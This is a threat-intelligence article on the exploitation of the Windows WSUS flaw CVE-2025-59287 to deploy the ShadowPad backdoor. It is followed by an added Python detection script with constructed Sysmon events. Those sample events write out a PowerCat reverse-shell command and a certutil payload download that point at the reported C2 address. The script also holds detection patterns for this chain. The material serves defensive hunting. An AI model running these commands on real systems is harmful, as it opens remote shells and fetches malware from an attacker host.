A recently patched critical vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, is being actively exploited to deploy the ShadowPad backdoor. Researchers at AhnLab Security Intelligence Center (ASEC) detailed the attack, noting that the threat actors targeted Windows Servers with the WSUS role exposed to the internet (by default TCP 8530 for HTTP and 8531 for HTTPS) and used the flaw for their initial foothold. From there, the attackers ran PowerCat, an open-source PowerShell implementation of Netcat, to obtain a command shell (cmd.exe), and used the built-in Windows utilities certutil.exe and curl.exe to download and execute ShadowPad.
ShadowPad is a modular backdoor widely associated with Chinese state-sponsored operations and generally regarded as the successor to the PlugX malware. Since its first appearance in 2015 it has matured into a highly capable espionage platform. SentinelOne researchers have previously described it as a “masterpiece of privately sold malware in Chinese espionage,” pointing to its advanced capabilities and its recurring role in state-level intrusions.
The vulnerability at the heart of these attacks, CVE-2025-59287, is a critical deserialization flaw in WSUS that lets an unauthenticated attacker achieve remote code execution as SYSTEM. Microsoft patched the flaw last month, but proof-of-concept exploit code became public shortly afterwards and the vulnerability was rapidly weaponized and exploited in the wild. Threat actors have used it for initial access, reconnaissance, and dropping legitimate tools such as Velociraptor; in the case documented by ASEC, they used the built-in curl.exe and certutil.exe to fetch the ShadowPad payload from an external server at 149.28.78[.]189:42306. Because both utilities are signed Microsoft binaries, network connections from them to unfamiliar external hosts, especially when their parent is a WSUS-spawned shell, are a practical hunting signal.
To execute, ShadowPad uses DLL side-loading, the same technique its predecessor PlugX relied on. A legitimate, signed application binary, in this instance ETDCtrlHelper.exe, is placed alongside a malicious DLL with the name it expects to load (ETDApix.dll). When the trusted executable starts, it loads the attacker's DLL, which acts as a loader that decrypts the actual backdoor and maps it into memory without writing the decrypted payload to disk. Because the initial execution appears to come from a legitimately signed process, the technique helps the malware evade detection; a DLL with this name loaded from a directory where the vendor's software is not installed, or one that fails signature verification, is the anomaly to look for.
Once loaded, the malware starts a core module that decrypts the additional plugins embedded in the main shellcode and loads them directly into memory. ShadowPad also carries a range of anti-detection and persistence techniques intended to keep a long-term presence on compromised systems and to resist removal. The group responsible for these attacks has not yet been definitively identified or attributed to any known threat actor.
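As an added example that is not part of the ASEC report or this article, the following hunting logic encodes the chain described above as rules over constructed Sysmon-style telemetry (Event ID 1 process creation, Event ID 7 image load). The field names follow Sysmon, the sample events are fabricated for illustration, and the WSUS host process names used as parents (wsusservice.exe, w3wp.exe) are an assumption about where the post-exploitation shell originates rather than something the article states. Only the C2 address and the ETDCtrlHelper.exe / ETDApix.dll pair come from the text.

```python
"""Hunting rules for the WSUS -> PowerCat -> certutil/curl -> ShadowPad side-load chain.

Added example, not ASEC's or the article's code. Events are constructed inline in a
Sysmon-like shape. WSUS_HOST_PROCESSES is an assumption about the exploited parent
process; KNOWN_C2 and SIDELOAD_PAIR are the indicators the article reports.
"""
import ipaddress
import re
from urllib.parse import urlsplit

WSUS_HOST_PROCESSES = {"wsusservice.exe", "w3wp.exe"}  # assumed: WSUS service / IIS worker
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
KNOWN_C2 = {("149.28.78.189", 42306)}                  # from the article (defanged there)
SIDELOAD_PAIR = ("etdctrlhelper.exe", "etdapix.dll")   # from the article

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_external(host):
    """True for a routable IP literal; DNS names are treated as external (conservative)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved)


def urls_in(cmdline):
    """Return (host, port) for every http(s) URL in a command line."""
    out = []
    for url in URL_RE.findall(cmdline):
        parts = urlsplit(url)
        if parts.hostname:
            out.append((parts.hostname, parts.port or (443 if parts.scheme.lower() == "https" else 80)))
    return out


def rule_wsus_spawned_shell(ev):
    """The WSUS host process should never spawn an interactive shell."""
    return (ev["EventID"] == 1 and basename(ev["ParentImage"]) in WSUS_HOST_PROCESSES
            and basename(ev["Image"]) in SHELLS)


def rule_powercat(ev):
    """Heuristic: PowerCat invoked by name on the command line."""
    return ev["EventID"] == 1 and "powercat" in ev["CommandLine"].lower()


def rule_lolbin_download(ev):
    """certutil/curl pulling from a routable address (internal mirrors are ignored)."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in DOWNLOADERS:
        return False
    return any(is_external(h) or (h, p) in KNOWN_C2 for h, p in urls_in(ev["CommandLine"]))


def rule_known_c2(ev):
    """Any command line that references the reported C2, as a URL or a bare IP."""
    if ev["EventID"] != 1:
        return False
    cmd = ev["CommandLine"]
    return (any((h, p) in KNOWN_C2 for h, p in urls_in(cmd))
            or any(ip in cmd for ip, _ in KNOWN_C2))


def rule_sideload(ev):
    """ETDCtrlHelper.exe loading an unsigned ETDApix.dll."""
    if ev["EventID"] != 7:
        return False
    host, dll = SIDELOAD_PAIR
    return (basename(ev["Image"]) == host and basename(ev["ImageLoaded"]) == dll
            and not ev.get("Signed", False))


RULES = [("wsus_spawned_shell", rule_wsus_spawned_shell), ("powercat", rule_powercat),
         ("lolbin_download", rule_lolbin_download), ("known_c2", rule_known_c2),
         ("sideload", rule_sideload)]


def detect(events):
    """Return (event_index, rule_name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample telemetry (not real logs). Paths and arguments are illustrative.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",                      # 0: WSUS -> cmd
     "ParentImage": r"C:\Program Files\Update Services\Service\wsusservice.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # 1: PowerCat
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -c powercat -c 149.28.78.189 -p 42306 -e cmd"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",                 # 2: stager download
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://149.28.78.189:42306/ETDApix.dll C:\ProgramData\ETDApix.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",                     # 3: benign internal mirror
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -o C:\temp\patch.msu http://10.0.5.20/patches/patch.msu"},
    {"EventID": 7, "Image": r"C:\ProgramData\ETDCtrlHelper.exe",                 # 4: side-load
     "ImageLoaded": r"C:\ProgramData\ETDApix.dll", "Signed": False},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",                      # 5: benign admin shell
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for idx, rule_name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

The benign events (an internal curl mirror, an explorer-launched shell) are included so the rules can be checked for false positives as well as hits; in a real deployment the same logic would be fed from Sysmon or Security event log exports rather than the inline list.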